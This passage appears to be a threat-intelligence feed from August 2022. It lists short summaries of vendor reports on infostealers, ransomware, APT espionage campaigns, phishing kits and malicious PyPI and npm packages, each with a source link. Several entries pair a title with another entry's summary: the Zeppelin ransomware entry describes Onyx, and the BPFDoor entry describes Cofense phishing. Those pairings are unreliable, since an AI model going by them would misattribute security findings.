Summary:: Researchers from Kaspersky have analyzed two PyPi packages that contain info-stealing malware and also modify the Discord client as well. The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.

Source: https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/

Intel Source:: Securonix

Intel Name:: Newly_Active_Malicious_Scanner_IPs

Date of Scan:: 2022-08-19

Impact:: LOW

Summary:: Internal scan, No git required

Source: Internal Source

Intel Source:: SocInvestigations

Intel Name:: Reemergence_of_Raccoon_Infostealer_Malware_with_New_TTPS

Date of Scan:: 2022-08-19

Impact:: LOW

Summary:: SocInvestigation researchers found new TTPs of Raccoon Infostealer Malware. It is an info stealer type malware available as malware-as-a-service on underground forums and this is a robust stealer that allows the stealing of data such as passwords, cookies, and autofill data from browsers.

Source: https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/

Intel Source:: Cybereason

Intel Name:: Attackers_Leveraging_Bumblebee_Loader

Date of Scan:: 2022-08-19

Impact:: LOW

Summary:: Cybereason GSOC team have analyzed a case that involved a Bumblebee Loader infection and its operators conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration.

Source: https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

Intel Source:: VirusTotal

Intel Name:: Detailed_Analysis_of_Follina_Vulnerability

Date of Scan:: 2022-08-19

Impact:: LOW

Summary:: VirusTotal cyber threat hunting team deeply analyzed the Follina vulnerability and provided a high-level overview of all observed attacks with a focus on the ones that took place before the 0-day was publicly disclosed and practical recommendations on how to monitor and hunt Follina samples.

Source: https://blog.virustotal.com/2022/08/hunting-follina.html

Intel Source:: ESET

Intel Name:: Lazarus_Group_Targeting_Job_Seekers_with-macOS_Malware

Date of Scan:: 2022-08-19

Impact:: LOW

Summary:: Slovak cybersecurity firm ESET have identified the North Korea-backed Lazarus Group targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.

Source: https://twitter.com/ESETresearch/status/1559553342057205761

Intel Source:: Secureworks

Intel Name:: Diving_Deep_into_DarkTortilla_Malware

Date of Scan:: 2022-08-19

Impact:: LOW

Summary:: Researchers from Secureworks Counter Threat Unit have found long-term threat DarkTortilla crypter is still evolving. It usually delivers information stealers and remote access trojans (RATs) like AgentTesla, AsyncRat, NanoCore, and RedLine, though some samples have been seen delivering such targeted payloads as Cobalt Strike and Metasploit.

Source: https://www.secureworks.com/research/darktortilla-malware-analysis

Intel Source:: Esentire

Intel Name:: A_new_variant_of_NJRAT

Date of Scan:: 2022-08-18

Impact:: LOW

Summary:: Esentire Cyber Threat Hunting team have discovered a new variant of NJRAT which is capable of logging keystrokes, viewing the victim’s camera, and remotely controlling the system.

Source: https://www.esentire.com/blog/njrat-comes-disguised-as-video-streaming-software

Intel Source:: CheckMarx

Intel Name:: Python_s_Top_Packages_attack

Date of Scan:: 2022-08-18

Impact:: LOW

Summary:: Researchers from Checkmarx security have detected a large-scale attack on the Python ecosystem with multi-stage persistent malware. A PyPi user account published a dozen malicious Typosquatting packages under the names of popular projects with slight permutation.

Source: https://medium.com/checkmarx-security/typosquatting-campaign-targeting-12-of-pythons-top-packages-downloading-malware-hosted-on-github-9501f35b8efb

Intel Source:: Mandiant

Intel Name:: Iranian_Threat_Actor_UNC3890_targets_Israeli_entities

Date of Scan:: 2022-08-18

Impact:: MEDIUM

Summary:: Mandiant researchers found a cyber espionage campaign targeting Israeli entities and organizations of various sectors, including government, shipping, energy and healthcare via social engineering lures and a potential watering hole. The attack have been attributed to UNC3890.

Source: https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

Intel Source:: Trustwave

Intel Name:: Cyber_Weapons_Used_in_the_Ukraine_Russia_War

Date of Scan:: 2022-08-18

Impact:: MEDIUM

Summary:: Cyberattacks leveraging malware are an important part of modern hybrid war strategy While conventional warfare is conducted on the battlefield and limited by several factors, cyber warfare continues in cyber space, offering the chance to infiltrate and damage targets far behind the frontlines

Source: https://www.trustwave.com/media/18925/final_spiderlabs_cyber-weapons-used-in-the-ukraine-russia-war.pdf

Intel Source:: Recorded Future

Intel Name:: Diving_deep_into_RedAlphas_cyber_espionage_activity

Date of Scan:: 2022-08-17

Impact:: LOW

Summary:: Researchers from Recordedfuture have analyzed multiple campaigns conducted by the Chinese state-sponsored threat activity group RedAlpha. It is very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations.

Source: https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf

Intel Source:: Securelist

Intel Name:: Surge_in_attack_through_malicious_Browser_Extension

Date of Scan:: 2022-08-17

Impact:: LOW

Summary:: Securelist analysts documented their findings about multiple Browser Extensions which have been targeting atleast 1.31 million users. The most prevalent threat is a family of adware called WebSearch, which masquerade as PDF viewers.

Source: https://securelist.com/threat-in-your-browser-extensions/107181/

Intel Source:: Trend Micro

Intel Name:: Trend_Micro_Research_on_Cloud_based_Cryptocurrency_mining

Date of Scan:: 2022-08-17

Impact:: MEDIUM

Summary:: TrendMicro in their research document shared their concerns about the impact on organization who running cloud instances and that potential victims of malicious cryptocurrency mining could be from any country or sector, making cloud-based cryptocurrency-mining attacks a global concern for companies.

Source: https://documents.trendmicro.com/assets/white_papers/wp-navigating-the-landscape-of-cloud-based-cryptocurrency-mining.pdf

Intel Source:: Microsoft

Intel Name:: Phishing_campaign_by_Russian_Threat_Actor_SEABORGIUM

Date of Scan:: 2022-08-16

Impact:: MEDIUM

Summary:: MSTIC disrupted SEABORGIUM threat actor campaign which belongs to Russia. Its campaigns involve persistent phishing and credential theft campaigns leading to intrusions and data theft.

Source: https://www.microsoft.com/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-operations/

Intel Source:: Symantec

Intel Name:: Russian_hackers_targeting_Ukraine_with_default_Word_template_hijacker

Date of Scan:: 2022-08-16

Impact:: MEDIUM

Summary:: Researchers from Symantec have observed campaigns that show phishing messages carrying a self-extracting 7-Zip archive that fetches an XML file from an “xsph.ru” subdomain associated with Gamaredon since May 2022.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm

Intel Source:: Sonatype

Intel Name:: PyPI_Package_Drops_Fileless_Cryptominer_to_Linux_Systems

Date of Scan:: 2022-08-16

Impact:: LOW

Summary:: Researchers from Sonatype have identified a 'secretslib' PyPI package that means 'secrets matching and verification made easy'. On a closer inspection though, the package covertly runs cryptominers on the Linux machine in-memory, a technique largely employed by fileless malware and crypters.

Source: https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero

Intel Source:: CERT-UA

Intel Name:: UAC_0010_Armageddon_leveraging_GammaLoad_and_GammaSteel_malwares

Date of Scan:: 2022-08-16

Impact:: LOW

Summary:: CERT-UA has tracked an attack since the first half of 2022, where the distribution of HTM-droppers via email leads to delivery of GammaLoad.PS1 malware and later delivers GammaSteel.PS1.

Source: https://cert.gov.ua/article/1229152

Intel Source:: Cyble

Intel Name:: Typhon_Stealer_being_spread_through_Phishing_sites

Date of Scan:: 2022-08-16

Impact:: LOW

Summary:: Cyble researchers analyzed a sample url which hosts a Windows executable payload. This Windows executable is a variant of Typhon stealer malware delivered via a crafted .lnk file.

Source: https://blog.cyble.com/2022/08/16/phishing-site-used-to-spread-typhon-stealer/

Intel Source:: TrendMicro

Intel Name:: A_chat_application_MiMi_compromised_by_Iron_Tiger_malware

Date of Scan:: 2022-08-15

Impact:: MEDIUM

Summary:: Researchers from TrendMcro discovered a server hosting the malicious samples who compromised chat application Mimi. This sample malware family a HyperBro used by Iron Tiger, an advanced persistent threat (APT) group that has been performing cyberespionage for almost a decade and now targeting Windows and Mac OS.

Source: https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html

Intel Source:: Cyble

Intel Name:: MikuBot_spies_on_Victims_using_hidden_VNC

Date of Scan:: 2022-08-15

Impact:: MEDIUM

Summary:: Researchers at Cyble Research Labs has identified a new malware called 'MikuBot', which Threat Actor was advertising in cybercrime forums. The bot steals sensitive data and runs hiddden VNC sessions, that allow threat actors to remotely access the target's system.

Source: https://blog.cyble.com/2022/08/11/mikubot-spotted-in-the-wild/

Intel Source:: Weixin

Intel Name:: The_observation_of_Conti_Group_activity_used_by_Russian_threat_actors

Date of Scan:: 2022-08-15

Impact:: MEDIUM

Summary:: Qi Anxin Threat Intelligence Center has been tracking on Russian-speaking threat actors and observed that Conti Group used Exchange vulnerabilities to target companies have a label "rich".

Source: https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g

Intel Source:: TrendMicro

Intel Name:: A_new_deployment_of_CopperStealer_s_distributing_malware

Date of Scan:: 2022-08-15

Impact:: MEDIUM

Summary:: TrendMicro shared their analyses with a public on the a new development of CopperStealer distributing malware by abusing browser stealer, adware browser extension, or remote desktop.

Source: https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html

Intel Source:: CISA

Intel Name:: Zeppelin_Ransomware

Date of Scan:: 2022-08-12

Impact:: MEDIUM

Summary:: Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”

Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-223a

Intel Source:: Morphisec

Intel Name:: A_new_upgrade_on_the_activity_of_APT_C_35_or_DoNot_Team

Date of Scan:: 2022-08-12

Impact:: MEDIUM

Summary:: Researchers at Morphisec Labs has monitored the activity of DoNot Team/APT-C-35, where the group updates a new module to its Windows framework.

Source: https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed

Intel Source:: ASEC

Intel Name:: A_distribution_of_Monero_CoinMiner_by_Webhards

Date of Scan:: 2022-08-12

Impact:: LOW

Summary:: The ASEC analysis team has discovered that Monero CoinMiner, also known as XMRig, is being distributed via file-sharing websites such as Korean webhards and torrents.

Source: https://asec.ahnlab.com/en/37526/

Intel Source:: Cyble

Intel Name:: Onyx_Ransomware_s_Recent_Operations

Date of Scan:: 2022-08-12

Impact:: LOW

Summary:: Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”

Source: https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/

Intel Source:: Palo Alto

Intel Name:: Tropical_Scorpius_deploys_ROMCOM_RAT_in_Cuba_Ransomware_operations

Date of Scan:: 2022-08-11

Impact:: MEDIUM

Summary:: A threat actor Tropical Scorpius dubbed by PaloAlto researchers have changed their TTPs and is also said to be associated with Cuba ransomware operations.

Source: https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/

Intel Source:: Palo Alto

Intel Name:: BlueSky_Ransomware_targets_Windows_hosts_and_utilizes_multithreading

Date of Scan:: 2022-08-11

Impact:: MEDIUM

Summary:: Researchers at Palo Alto has analysed code samples of BlueSky Ranswomware, which they found to be connected with Conti Ransomware Group. The multithreaded structure of BlueSky code similarities with Conti V3. Moreover, BlueSky also closely resembles algorithm for file encryption with Babuk Ransomware too.

Source: https://unit42.paloaltonetworks.com/bluesky-ransomware/

Intel Source:: Zscaler

Intel Name:: AiTM_attack_targets_Gmail_Enterprise_users

Date of Scan:: 2022-08-11

Impact:: MEDIUM

Summary:: Zscaler researchers followed upon their last findings about AiTM phishing campaign againts the Microsoft email services and found that same campaign has been targeting enterprise users of Gmail.

Source: https://www.zscaler.com/blogs/security-research/aitm-phishing-attack-targeting-enterprise-users-gmail

Intel Source:: Securelist

Intel Name:: DeathStalker's_VileRAT_continue_target_Foreign_and_Crypto_Exchanges

Date of Scan:: 2022-08-11

Impact:: MEDIUM

Summary:: Securelist has shared that the threat actor known as DeathStalker has continued to target and disrupt foreign and cryptocurrency exchanges around the world throughout 2022 using the VileRAT malware. Since late 2021, the infection technique has changed a little bit, but the initial infection vector is still a malicious message is sent to targets via email. In July 2022, Securelist also noticed that the attackers leveraged chatbots that are embedded in targeted companies’ public websites to send malicious DOCX to their targets.

Source: https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/

Intel Source:: Cisco

Intel Name:: Raspberry_Robin_tries_to_remain_undetected

Date of Scan:: 2022-08-11

Impact:: MEDIUM

Summary:: Researchers at Cisco has analysed a distingushed pattern of msiexec.exe usage across different endpoints. As they drilled down to individual assets, they found traces of Raspberry Robin malware.

Source: https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks

Intel Source:: Bitsight

Intel Name:: Emotet_re-introduction_SMB_spreader_module

Date of Scan:: 2022-08-11

Impact:: LOW

Summary:: Researchers at Bitsight has observed the Emotet botnets version Epoch4 delivering a new module to the infected systems that turned out to be a credit card stealer targeting Google Chrome. Later, they found that Emotet version Epoch4 also re-introduced the SMB spreader module.

Source: https://www.bitsight.com/blog/emotet-smb-spreader-back

Intel Source:: Cisco Talos

Intel Name:: Yanluowang ransomware gang targets Cisco

Date of Scan:: 2022-08-11

Impact:: MEDIUM

Summary:: Cisco Talos has analyzed a recent attack on Cisco by Yanluowang ransomware group which breached its corporate network in late May. The attackers could only harvest and steal non-sensitive data from a Box folder linked to a compromised employee's account.

Source: https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

Intel Source:: Securelist

Intel Name:: Korean_speaking_APT_deploys_DTrack_and_Maui_Ransomware

Date of Scan:: 2022-08-10

Impact:: MEDIUM

Summary:: Researchers from SecureList were able to attribute Maui ransomware attack to korean speaking APT group called Andriel. They also found out that before deploying the ransomware they deployed a variant of DTrack malware.

Source: https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/

Intel Source:: Palo Alto

Intel Name:: IcedID_or_Bokbot_infection_led_to_Cobalt_Strike

Date of Scan:: 2022-08-10

Impact:: MEDIUM

Summary:: Securonix Threat Labs has monitored OSINT sources and identified a new infection of IcedID delivering CobaltStrike.

Source: https://twitter.com/Unit42_Intel/status/1557009330762809348 https://github.com/pan-unit42/tweets/blob/master/2022-08-08-IOCs-for-IcedID-and-Cobalt-Strike.txt

Intel Source:: Fortinet

Intel Name:: SmokeLoader_malware_drops_zgRAT_by_exploiting_old_flaws

Date of Scan:: 2022-08-10

Impact:: MEDIUM

Summary:: Researchers at FortiGuard Labs has analysed a recent instance of SmokeLoader, where the malware exploiting five years old CVE-2017-0199 and CVE-2017-11882. This malware sample drops zgRAT, a rare payload compared to previously delivers by SmokeLoader.

Source: https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities?&web_view=true

Intel Source:: Resecurity

Intel Name:: LogoKit_returns_leveraging_Open_Redirect_Vulnerabilities

Date of Scan:: 2022-08-10

Impact:: LOW

Summary:: Researchers at Resecurity has discovered that threat actors leveraging Open Redirect Vulnerabilities popular in online services and apps to bypass spam filters to ultimately deliver phishing content.

Source: https://resecurity.com/blog/article/logokit-update-the-phishing-kit-leveraging-open-redirect-vulnerabilities

Intel Source:: Walmart

Intel Name:: Drilling_down_into_SharpEx_browser_extension_malware

Date of Scan:: 2022-08-09

Impact:: LOW

Summary:: Walmart researchers further drilled down on analyzing a browser extension dubbed SharpExt used by north korean threat actor Kimsuky. The goal of the extension is to steal emails and attachments from the victims.

Source: https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9

Intel Source:: Kaspersky

Intel Name:: Chinese_APT_group_targets_Asia_and_Eastern_Europe

Date of Scan:: 2022-08-09

Impact:: MEDIUM

Summary:: Kaspersky reseacrhers found series of attacks targeting organizations in Asia and Eastern Europe. These attacks have been attributed to Chinese APT group TA428.

Source: https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/

Intel Source:: Netlab 360

Intel Name:: Orchard_Botnet_used_to_generate_malicious_domains

Date of Scan:: 2022-08-09

Impact:: LOW

Summary:: Researchers from Qihoo 360's Netlab security team came across a new botnet named Orchard which was using Bitcoin creator Satoshi Nakamoto's account transaction information to generate malicious domain names to conceal its command-and-control (C2) infrastructure.

Source: https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/

Intel Source:: DFIR Report

Intel Name:: BumbleBee_malware_found_its_way_to_Domain_Admin

Date of Scan:: 2022-08-09

Impact:: MEDIUM

Summary:: DFIR Report researchers analyzed an intrusion which involved BumbleBee as the initial access vector. The intrusion began with a password protected zipped ISO file.

Source: https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

Intel Source:: PTSecurity

Intel Name:: APT31_targets_Russian_companies

Date of Scan:: 2022-08-08

Impact:: MEDIUM

Summary:: PT Expert Security Center analysts found an attack targeting Russian media and energy companies. These attacks have been attributed to APT31.

Source: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/

Intel Source:: ReversingLabs

Intel Name:: GwisinLocker_Ransomware_Targets_Linux_Based_Systems

Date of Scan:: 2022-08-08

Impact:: LOW

Summary:: A new ransomware family called 'GwisinLocker' has emerged targeting South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors.

Source: https://blog.reversinglabs.com/blog/gwisinlocker-ransomware-targets-south-korean-industrial-and-pharmaceutical-companies

Intel Source:: Meta

Intel Name:: Two_cyber_espionage_operations_by_Bitter_APT_and_APT36

Date of Scan:: 2022-08-08

Impact:: MEDIUM

Summary:: Researchers at Meta has published a Quarter Threat report where they took action on two cyber espionage operations in South Asia, both the operations was linked to Biter APT and APT36 respectively. Researchers has also shared new and notewrothy TTPs for both the actors.

Source: https://about.fb.com/wp-content/uploads/2022/08/Quarterly-Adversarial-Threat-Report-Q2-2022.pdf

Intel Source:: Crowdstrike

Intel Name:: Four_CATAPULT_SPIDER_Challenges

Date of Scan:: 2022-08-08

Impact:: LOW

Summary:: Crowdstrike has published a blog describing about intended approach to solvE the challenges of the eCrime track. The participants in the Adversary Quest analyzed new activity by CATAPULT SPIDER.

Source: https://www.crowdstrike.com/blog/catapult-spider-adversary-quest-walkthrough-2022/

Intel Source:: Fortinet

Intel Name:: A_new_IoT_malware_family_called_RapperBot

Date of Scan:: 2022-08-05

Impact:: MEDIUM

Summary:: FortiGuard Labs has identified a new family of IoT malware that uses code derived from the Mirai network to gain access to SSH servers and maintain persistence on a victim device after it is removed.

Source: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery

Intel Source:: Palo Alto

Intel Name:: Bumblebee_malware_activity_distributed_through_Projector_Libra

Date of Scan:: 2022-08-05

Impact:: MEDIUM

Summary:: Researchers from PaloAlto have identified Bumblebee malware distributing through Projector Libra. It is a criminal group that uses file sharing services to distribute malware after direct email correspondence with a potential victim.

Source: https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

Intel Source:: Deepwatch

Intel Name:: Threat_Actor_leverages_Confluence_Bug_to_Deploy_Ljl_Backdoor

Date of Scan:: 2022-08-05

Impact:: MEDIUM

Summary:: A novel backdoor called Ljl discovered by Deepwatch Adversary Tactics and Intelligence Team. The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory," the company said. "After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment."

Source: https://cdn1.hubspot.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/eBooks/Deepwatch%20Incident%20Intel%20Report%20-%20Novel%20Backdoor%20Discovered%20-%20Aug%202022.pdf https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/ljlBackdoor%20Analysis.pdf

Intel Source:: ASEC

Intel Name:: A_distribution_of_malicious_Word_files_with_North_Korea_related_materials

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: The ASEC analysis team has discovered another distribution of malicious Word files with North Korea-related materials. The malicious Word files are distributed in various names most likely through the email and with a file related to a specific webinar and accesses C2 through mshta.

Source: https://asec.ahnlab.com/en/37396/

Intel Source:: Cisco Talos

Intel Name:: Malware_campaigns_leveraging_"Dark Utilities"_platform

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: Researchers at Cisco Talos has identified a C2-as-a-service (C2aaS) platform known as "Dark Utilities" offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The payloads provided by the platform support Windows, Linux and Python-based implementations.

Source: https://blog.talosintelligence.com/2022/08/dark-utilities.html

Intel Source:: Cloudsek

Intel Name:: Deep_Analysis_of_Bumblebee_Malware

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: Researchers from CloadSEK did a deep analysis of the Bumblebee malware loader where the adversaries push ISO files through compromised email chains, known as thread hijacked emails, to deploy the Bumblebee loader.

Source: https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/?utm_source=rss&utm_medium=rss&utm_campaign=technical-analysis-of-bumblebee-malware-loader

Intel Source:: Walmart

Intel Name:: IcedID_leveraging_PrivateLoader

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: Researcchers from Walmart have analysed PrivateLoader is continue to function as an effective loading service and recently leveraging the use of SmokeLoader for their loads.

Source: https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f

Intel Source:: MalwareBytes

Intel Name:: Russian_organizations_attacked_with_new_Woody_RAT_malware

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: Researchers from Malwarebytes Threat Intelligence team have identified a new Remote Access Trojan called Woody Rat that allows them to control and steal information from compromised devices remotely.

Source: https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/

Intel Source:: Mandiant

Intel Name:: New_campaign_by_Iranian_Threat_Actor

Date of Scan:: 2022-08-04

Impact:: MEDIUM

Summary:: Researchers from Mandiant identified politically motivated disruptive attack against Albanian government organizations. Usage of ROADSWEEP ransomware and CHIMNEYSWEEP backdoor was also noted by the researchers.

Source: https://www.mandiant.com/resources/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against

Intel Source:: Cyble

Intel Name:: LOLI_Stealer_A_new_Golang_Based_InfoStealer

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: Cyble researchers came across a new golang based infostealer dubbed LOLI stealer. This stealer was being sold via Maas Model.

Source: https://blog.cyble.com/2022/08/03/loli-stealer-golang-based-infostealer-spotted-in-the-wild/

Intel Source:: VirusTotal

Intel Name:: Malware_disguised_as_Legitimate_Software

Date of Scan:: 2022-08-04

Impact:: LOW

Summary:: Researchers from VirusTotal have analyzed malware samples and found 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.

Source: https://blog.virustotal.com/2022/08/deception-at-scale.html

Intel Source:: Iornnet

Intel Name:: Robin_Banks_PhaaS_Targeting_Citibank_Customers

Date of Scan:: 2022-08-03

Impact:: LOW

Summary:: Researchers from IronNet have identified Phishing-as-a-Service platform Robin Banks selling ready to use phishing kits to cybercriminals. The kits are used to obtain financial details of victims living in the U.S, the U.K, Canada, and Australia.

Source: https://www.ironnet.com/blog/robin-banks-a-new-phishing-as-a-service-platform

Intel Source:: SentinelOne

Intel Name:: LockBit_Ransomware_Leveraging_Windows Defender_to_load_Cobalt_Strike_Payload

Date of Scan:: 2022-08-02

Impact:: MEDIUM

Summary:: Researchers from SentinelOne have recently investigated the LockBit Ransomware and found that threat actor is abusing the Windows Defender command line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.

Source: https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

Intel Source:: Cyble

Intel Name:: Mars_Stealer_distributing_via_fake_wallet_site

Date of Scan:: 2022-08-02

Impact:: LOW

Summary:: Cyble Research Labs due to their research, discovered Mars stealer and the threat actors behind Mars stealer are adopting sophisticated phishing attacks to distribute Mars Stealer and gather user credentials, system information, and other sensitive data.

Source: https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/

Intel Source:: Cisco Talos

Intel Name:: Manjusaka_Offensive_Framework

Date of Scan:: 2022-08-02

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos has discovered a new attack framework called Manjusaka. This framework is advertised as reproduction of Cobalt Strike framework. Moreover, implants for the malware are written in Rust language for Windows and Linux.

Source: https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html

Intel Source:: Security Scorecard

Intel Name:: A_Deep_Dive_Analysis_of_RedLine_Stealer_Malware

Date of Scan:: 2022-08-02

Impact:: LOW

Summary:: Researchers have recently done an in-depth investigation on RedLine Stealer which is distributing cracked games, applications, and services.

Source: https://securityscorecard.com/research/detailed-analysis-redline-stealer

Intel Source:: Trendmicro

Intel Name:: An_updated_variant_of_SolidBit_ransomware_new_targets

Date of Scan:: 2022-08-02

Impact:: LOW

Summary:: Threndmicro published the technical analysis of a new SolidBit variant that is a threat to different applications to lure gamers and social media users. SolidBit has been suspected of being a LockBit ransomware copycat. Also, this ransomware group appears to be planning to expand its operations through these fraudulent apps and its recruitment of ransomware-as-a-service affiliates.

Source: https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamers-and-social-media-users-with-new-variant-/IOCs-SolidBit-Ransomware-Enters-the-RaaS-Scene-and-Takes-Aim-at-Gamers-and-Social-Media-Users-With-New-Variant%20.txt

Intel Source:: Zscaler

Intel Name:: Analysis_on_Industrial_Spy_Ransomware

Date of Scan:: 2022-08-02

Impact:: MEDIUM

Summary:: Zscaler published their technical analyses on the Industrial Spy ransomware group that emerged in April 2022 that started by ransoming stolen data and more recently has combined these attacks with ransomware.The threat group exfiltrates and sells data on their dark web marketplace, but does not always encrypt a victim’s files. Also they utilizes a combination of RSA and 3DES to encrypt files.

Source: https://www.zscaler.com/blogs/security-research/technical-analysis-industrial-spy-ransomware?&web_view=true

Intel Source:: EclecticIQ

Intel Name:: Emotet_Downloader_Leveraging_Regsvr32_tool

Date of Scan:: 2022-08-02

Impact:: LOW

Summary:: Researchers from EclecticIQ have observed Emotet downloader distributing via the Regsvr32 tool for execution.

Source: https://blog.eclecticiq.com/emotet-downloader-document-uses-regsvr32-for-execution

Intel Source:: Securelist

Intel Name:: A new_malicious_campaign_LofyLife

Date of Scan:: 2022-08-01

Impact:: LOW

Summary:: The Kaspersky has discovered a new threat in the open-source software repository “LofyLife” - a malicious campaign to steal tokens and bank card data.

Source: https://securelist.com/lofylife-malicious-npm-packages/107014/

Intel Source:: Qualys

Intel Name:: Multiple_APT_Groups_Leveraging_Quasar_RAT

Date of Scan:: 2022-08-01

Impact:: MEDIUM

Summary:: Researchers from Qualys have analyzed the Quasar RAT which is widely leveraged by multiple threat actor groups targeting government and private organizations in Southeast Asia and other geographies.

Source: https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf

Intel Source:: SpiderLabs

Intel Name:: Phishing_Attacks_Increase_Using_Decentralized_IPFS_Network

Date of Scan:: 2022-08-01

Impact:: LOW

Summary:: Researchers from SpiderLab have identified that the decentralized file system solution 'IPFS' is becoming the new place for hosting phishing sites. Also, they identified no less than 3,000 emails containing IPFS phishing URLs as an attack vector in the last three months.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/

Intel Source:: Inquest

Intel Name:: Green_Stone_sample_attributed_to_Iran

Date of Scan:: 2022-08-01

Impact:: LOW

Summary:: Inquest discovered a maliciuos sample that was uploaded from Iran. The document is a contract for the supply of services to an energy company from southern Iran «Tavangoostar Niro va Gashtavar Jonob». The document also contains a link to this energy company. www.tavangyl.com. Analysts named it Green Stone since this family of malicious documents containing executable files was not previously known.

Source: https://inquest.net/blog/2022/07/27/green-stone

Intel Source:: Qualys

Intel Name:: Diving_Deep_into_BPFDoor_Malware

Date of Scan:: 2022-08-01

Impact:: LOW

Summary:: Researchers from the Phishing Defense Center of Cofense have observed a huge variety of phishing techniques. In this, some of the techniques are quite unique in methods of getting the end user to interact with the message.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor

Intel Source:: Trustwave

Intel Name:: An_increasing_number_of_phishing_emails_containing_IPFS_URLs

Date of Scan:: 2022-08-01

Impact:: LOW

Summary:: Trustwave noticed an increasing number of phishing emails containing IPFS URLs as their payload. Also they have observed more than 3,000 emails containing phishing URLs that have utilized IPFS for the past 90 days and it is evident that IPFS is increasingly becoming a popular platform for phishing websites.

Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/

Intel Source:: Cofense

Intel Name:: Attackers_Leveraging_New_Phishing_Techniques

Date of Scan:: 2022-08-01

Impact:: LOW

Summary:: Researchers from the Phishing Defense Center of Cofense have observed a huge variety of phishing techniques. In this, some of the techniques are quite unique in methods of getting the end user to interact with the message.

Source: https://cofense.com/blog/countdown-timer-ransomware-themed-phishing-attack

Intel Source:: Sucuri

Intel Name:: WebAssembly_frequently_used_for_cryptomining

Date of Scan:: 2022-07-29

Impact:: LOW

Summary:: Sucuri recently contacted by a their client who noticed that their computer slowed down to a crawl every time they navigated to their own WordPress website. A cursory review of their site files revealed the following snippet of code injected into one of their theme files.

Source: https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html

Intel Source:: Cybergeeks

Intel Name:: Analysis_on_Symbiote_Malware

Date of Scan:: 2022-07-29

Impact:: LOW

